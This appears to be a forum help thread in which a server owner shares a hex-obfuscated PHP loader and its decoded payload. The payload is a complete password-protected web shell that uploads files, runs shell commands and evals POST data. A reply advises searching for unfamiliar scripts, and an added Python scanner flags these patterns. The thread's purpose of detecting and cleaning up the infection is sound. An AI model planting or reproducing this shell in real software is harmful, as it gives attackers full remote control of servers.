Hi, I have an infection on my server. There are some encrypted files on it. They come back after I delete them. The local PC has been tested for infection, but nothing was found. Passwords on the server were changed. Here is a file after decrypting with dezend:
echo " "; $s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sss = ""; $k = 0; for ( ; $k < strlen( $s ); $k += 2 ) { $ss = chr( "0x".substr( $s, $k, 2 ) + 0 ); $sss .= $ss; } eval( $sss ); $ssss = "************************************************************************************************************************************"; echo "\r\n"; ?>
Here is that code decrypted, if it helps:
<? if (strlen($_POST[ccc])==0){if ($_POST[pass]!='123'){echo ' <html> <body bgcolor=#BBFFBB onload="document.myf.pass.focus();"> <form method=POST> <input name=pass> </form> </body> </html> ';exit();}echo ' <html> <body bgcolor=#BBFFBB onload="document.myf.cc.focus();"> ';echo ' <form name=myf method=POST enctype="multipart/form-data"> <input type=hidden name=pass value='.$_POST[pass].'> <input type=file name=upfile> <input name=newname> <input type=submit> <br>'; echo '<input name=cc size=73 value="'.stripslashes($_POST[cc]).'"></form>'; echo '<pre>'; if (move_uploaded_file($_FILES['upfile']['tmp_name'], $_POST[newname])) { /*echo "Sent.<br> \n";*/ }if ($_POST[mfile]) { $fp=fopen($_POST[newname],'w'); for($k=0; $k<strlen($_POST[mfile]); $k+=2) { $cc = substr($_POST[mfile],$k,2); $cc = '0x'.$cc; $cc = round($cc); $cc = chr($cc); fwrite($fp,$cc); } fclose($fp); }$co=stripslashes($_POST[cc]); $out = '';if(function_exists('exec')){exec($co,$out);$out = join("\n",$out);}elseif(function_exists('passthru')){ob_start();passthru($co);$out = ob_get_contents();ob_end_clean();}elseif(function_exists('system')){ob_start();system($co);$out = ob_get_contents();ob_end_clean();}elseif(function_exists('shell_exec')){$out = shell_exec($co);}elseif(is_resource($f = popen($co,"r"))){$out = "";while(!@feof($f)) { $out .= fread($f,1024);}pclose($f);}else {$out='ex failed';}echo $out;echo '</pre>';echo '</body></html>';} else {if(get_magic_quotes_gpc()){eval(stripslashes($_POST[ccc]));} else {eval($_POST[ccc]);}} ?>
Search for any cgi scripts that you have not previously uploaded. You may want to dig in logs for cgi, unless renamed, possibly x2 or 2x .cgi. Hope this points you in the right direction.
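The search for unfamiliar scripts can be partly automated by looking for the constructs visible in the two samples above: the hex-pair decoding loop followed by eval, eval of request data, uploads written to a client-chosen path, and the chain of function_exists probes for command execution. The following Python scanner is an added example, not code from any poster in this thread; its function names, the extension list and the sample strings are assumptions constructed for illustration, and it only decodes hex layers statically without executing anything.

```python
import re
from pathlib import Path

# Patterns taken from the two PHP samples posted in this thread.
INDICATORS = {
    # chr("0x".substr($s, $k, 2)): the hex-pair decoding loop of the outer file
    "hex_decode_loop": re.compile(r"""chr\s*\(\s*["']0x["']\s*\.\s*substr\s*\(""", re.I),
    # eval() of a plain variable, as in eval($sss)
    "eval_variable": re.compile(r"eval\s*\(\s*\$\w+\s*\)", re.I),
    # eval() fed from request data, as in eval($_POST[ccc])
    "eval_request_input": re.compile(r"eval\s*\([^;]*\$_(POST|GET|REQUEST|COOKIE)\b", re.I),
    # uploaded file written to a client-chosen path
    "upload_to_request_path": re.compile(r"move_uploaded_file\s*\([^;]*\$_(POST|GET|REQUEST)\b", re.I),
}
EXEC_PROBE = re.compile(r"function_exists\s*\(\s*['\"](exec|passthru|system|shell_exec)['\"]", re.I)
HEX_LITERAL = re.compile(r"""["']((?:[0-9a-fA-F]{2}){8,})["']""")
EXTENSIONS = {".php", ".phtml", ".inc", ".cgi"}  # assumption: adjust to the server

def scan_php(text, depth=0):
    """Return indicator names found in text and in statically decoded hex layers."""
    hits = {name for name, rx in INDICATORS.items() if rx.search(text)}
    if len({name.lower() for name in EXEC_PROBE.findall(text)}) >= 3:
        hits.add("exec_fallback_chain")
    if depth < 3:  # decode only, never execute; bounded against nested layers
        for blob in HEX_LITERAL.findall(text):
            decoded = bytes.fromhex(blob).decode("latin-1")
            hits |= {"decoded:" + h for h in scan_php(decoded, depth + 1)}
    return hits

def scan_tree(root):
    """Map each script under root that has at least one indicator to its hits."""
    report = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in EXTENSIONS:
            hits = scan_php(path.read_text(errors="replace"))
            if hits:
                report[str(path)] = hits
    return report

# Constructed samples (not the files from the thread).
SAMPLE_INNER = "<? if(get_magic_quotes_gpc()){eval(stripslashes($_POST[ccc]));} else {eval($_POST[ccc]);} ?>"
SAMPLE_OUTER = ('<?php $s = "%s"; $sss = ""; for ($k = 0; $k < strlen($s); $k += 2) '
                '{ $sss .= chr("0x".substr($s, $k, 2) + 0); } eval($sss); ?>'
                ) % SAMPLE_INNER.encode().hex()
SAMPLE_CLEAN = "<?php echo strtoupper(substr($name, 0, 2)); ?>"

if __name__ == "__main__":
    for label, src in [("outer", SAMPLE_OUTER), ("inner", SAMPLE_INNER), ("clean", SAMPLE_CLEAN)]:
        print(label, sorted(scan_php(src)))
```

A hit is a reason to inspect the file by hand and compare it against a known-good copy of the site; a renamed or differently obfuscated file can still evade these patterns.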
Great! Glad to hear it. Should anything occur in the future, let me know and I'll be glad to help ya out!